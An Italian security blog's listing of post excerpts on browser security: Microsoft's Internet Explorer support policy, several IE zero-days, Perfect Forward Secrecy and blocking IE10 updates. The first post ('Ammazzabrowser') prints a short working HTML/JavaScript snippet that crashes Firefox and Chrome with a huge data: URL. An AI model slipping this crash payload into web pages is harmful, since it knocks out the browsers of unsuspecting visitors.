Ammazzabrowser

<!DOCTYPE html>
<html>
 <head>
 <script>
 location = 'data:text/html,<script>location = "location.toString + \"A\"";' + 'A'.repeat( 100000000 );
 </script>
 </head>
</html>

Questo semplice testo in una pagina HTML manda a zampe all’aria Firefox e Google Chrome, mentre Internet Explorer esce illeso.

Potete farlo da voi oppure andare a vostro rischio su crashfirefox.com. Leggi tutto “Ammazzabrowser”

Nuove politiche per MSIE

Microsoft ha annunciato una serie di novità per il supporto di Internet Explorer.

I tempi potrebbero sembrare geologici, ma questi cambiamenti hanno profonde ripercussioni nelle organizzazioni multinazionali che utilizzano Internet Explorer come frontend per le procedure interne.

A partire dal 12 gennaio 2016 solamente le ultime versioni di Internet Explorer per ciascuna piattaforma riceveranno supporto e aggiornamenti. La decisione è decisamente sensata, in quanto limita la complessità del supporto e riduce i vettori di attacco verso i client.

Allo stato attuale, le ultime versioni disponibili per le varie piattaforme sono:

  • Windows Vista SP2: Internet Explorer 9
  • Windows Server 2008 SP2: Internet Explorer 9
  • Windows Server 2012: Internet Explorer 10
  • Windows 7 SP1: Internet Explorer 11
  • Windows Server 2008 R2 SP1: Internet Explorer 11
  • Windows 8.1: Internet Explorer 11
  • Windows Server 2012 R2: Internet Explorer 11

Leggi tutto “Nuove politiche per MSIE”

Usare Internet Explorer è un rischio

Evitate Internet Explorer. Usate il browser che più vi piace, usatene due, tre contemporaneamente, fate telnet sulla porta 80, tirate fuori Mosaic dalla naftalina… Ma evitate Internet Explorer.

Secondo alcune persone ci sono siti che si aprono solamente con Explorer; può essere vero, ma quand’è l’ultima volta che avete fatto dei test? Browser e siti vengono aggiornati quasi settimanalmente e questi test dovrebbero essere ripetuti periodicamente prima di dichiarare la non-compatibilità.

Il problema di Internet Explorer è la quantità di vulnerabilità note che Microsoft decide scientemente di non correggere.

In pratica, se si usa quel browser si decide di utilizzare un programma di cui sono note le vulnerabilità a chi vi vuole attaccare, il quale avrà gioco facile a fare quello che vuole con il vostro PC. Spesso abbiamo dato conto anche qui dei vari problemi di Explorer, ma ad un certo punto la cosa non fa più notizia e si rischia l’effetto copia-e-incolla.

Bromium Labs ha dimostrato con uno studio [PDF] la pericolosità di Internet Explorer: il risultato è che nel primo semestre di quest’anno le vulnerabilità di Explorer sono raddoppiate, a fronte di un crollo di quelle di Java e una diminuzione sostanziale di quelle di Flash e Adobe Reader.

Usare Internet Explorer per la navigazione generale (ovvero non in maniera specifica con quei siti che richiedono espressamente il browser di Microsoft) è un comportamento molto rischioso.

MSIE + Flash = 0-Day

Nuovo Zero-Day di Internet Explorer con installato il plugin di Adobe Flash.

Secondo Microsoft stessa la vulnerabilità interessa tutte le versioni del browser dalla 6 alla 11 incluse, anche se lo 0-day che è stato analizzato (ma non è detto che non ne esistano altri) colpisce solamente le versioni dalla 9 alla 11 incluse.

La vulnerabilità in questione permette all’attaccante di eseguire codice arbitrario sul computer della vittima (remote code execution) bypassando ogni tipo di protezione sia se viene utilizzato Internet Explorer come browser sia se viene utilizzato per visualizzare i contenuti HTML all’interno di altri programmi, come Outlook. Leggi tutto “MSIE + Flash = 0-Day”

Perfect Forward Secrecy

Il protocollo HTTPS come è implementato da molti siti o browser ha un problema con il futuro.

Ipotizzando che qualcuno stia registrando tutto il traffico HTTPS di un sito adesso potrebbe solamente avere in mano dei dati illeggibili. Ma cosa succederebbe se venisse trafugata la chiave segreta, oppure se un domani i computer riuscissero in poche settimane a scardinare la chiave utilizzata?

C’è un passaggio fondamentale nei primi millisecondi del protocollo HTTPS:

Il browser, verificato il certificato, invia un messaggio al server che contiene un altro numero casuale cifrato con la chiave pubblica del server

Quindi, chi riuscisse a calcolare o trafugare la chiave privata del server potrebbe decifrare tutto il traffico HTTPS protetto con quella coppia di chiavi, ipoteticamente salvato negli anni, che fino a quel momento non era decifrabile (retrospective decryption).

Lo scambio di una chiave segreta condivisa su un canale non sicuro è un problema non nuovo. Whitfield DiffieMartin Hellman e Ralph Merkle avevano trovato una soluzione già negli anni ’70 del secolo scorso elaborando quello che poi sarebbe diventato il protocollo Diffie-Hellman per lo scambio di chiavi (brevetto US4200770 ora scaduto).

Anche in questo caso bisogna fare un passo indietro per vedere come funzionano le cose dietro le quinte.

Leggi tutto “Perfect Forward Secrecy”

Un altro zero-day per Internet Explorer

Questa storia rischia di diventare una rubrica settimanale.

FireEye Labs ha scoperto un nuovo zero-day di Internet Explorer. Si tratta di un attacco ROP portato al programma quando questo verifica la data dell’header PE di msvcrt.dll. Se l’attacco va a buon fine, il malware può eseguire codice arbitrario sul computer della vittima (remote code execution).

Il campione di malware esaminato da FireEye è destinato a Windows XP e 7 con Internet Explorer 7 e 8 versione inglese. Tuttavia la vulnerabilità esiste in tutte le versioni di Internet Explorer e il malware può essere facilmente modificato per attaccare altre versioni e altre localizzazioni del software.

Non sono disponibili patch per questo problema, l’unica soluzione è evitare di utilizzare Internet Explorer oppure installare e configurare Microsoft EMET. (via ISC)

Aggiornamento 12/11/2013 – Questo baco verrà corretto con il patch tuesday di oggi.

Bloccare Internet Explorer 10

L’aggiornamento di un software come il browser Internet è sempre da eseguire, ma ci possono essere delle necessità che sconsigliano il passaggio alla versione superiore.

In molte organizzazioni vengono utilizzate applicazioni web che si potrebbero rivelare non compatibili con Explorer 10 o, peggio, compatibili solamente con una versione di Explorer e non utilizzabili con altri browser.

In questi casi gli amministratori sono costretti a bloccare gli aggiornamenti, per Explorer 10 Microsoft ha rilasciato un apposito kit (FAQ).

Il kit non è nulla di astronomico, contiene un template da importare nelle policy di dominio e un file batch.

Leggi tutto “Bloccare Internet Explorer 10”

Vulnerabilità per Internet Explorer 6, 7 e 8

Blocked windowMicrosoft ha diramato il Security Advisory 2794220 che documenta una vulnerabilità delle versioni di Internet Explorer fino alla 8 inclusa.

La vulnerabilità, già sfruttata da alcuni attacchi, permette ad un malintenzionato di eseguire programmi arbitrari sul computer della vittima (remote code execution).

Chi ha Windows Vista o Windows 7 dovrebbe installare Internet Explorer 9. Purtroppo per loro, gli utenti che hanno Windows XP restano per ora vulnerabili, finché non viene pubblicata una patch.

Tra i fattori mitiganti citati da Microsoft ci sono l’attivazione della enhanced security sui server, ma la nota tecnica dice che questa funzione mitiga il problema, non dice che lo evita. (via Slashdot)

Aggiornamento 1/1/2013 – Microsoft ha reso disponibile un FixIt per sistemare il problema in attesa di una patch.

Aggiornamento 5/1/2013Exodus Intelligence è riuscita a bypassare la patch di FixIt e a compromettere un sistema patchato. (via ISC)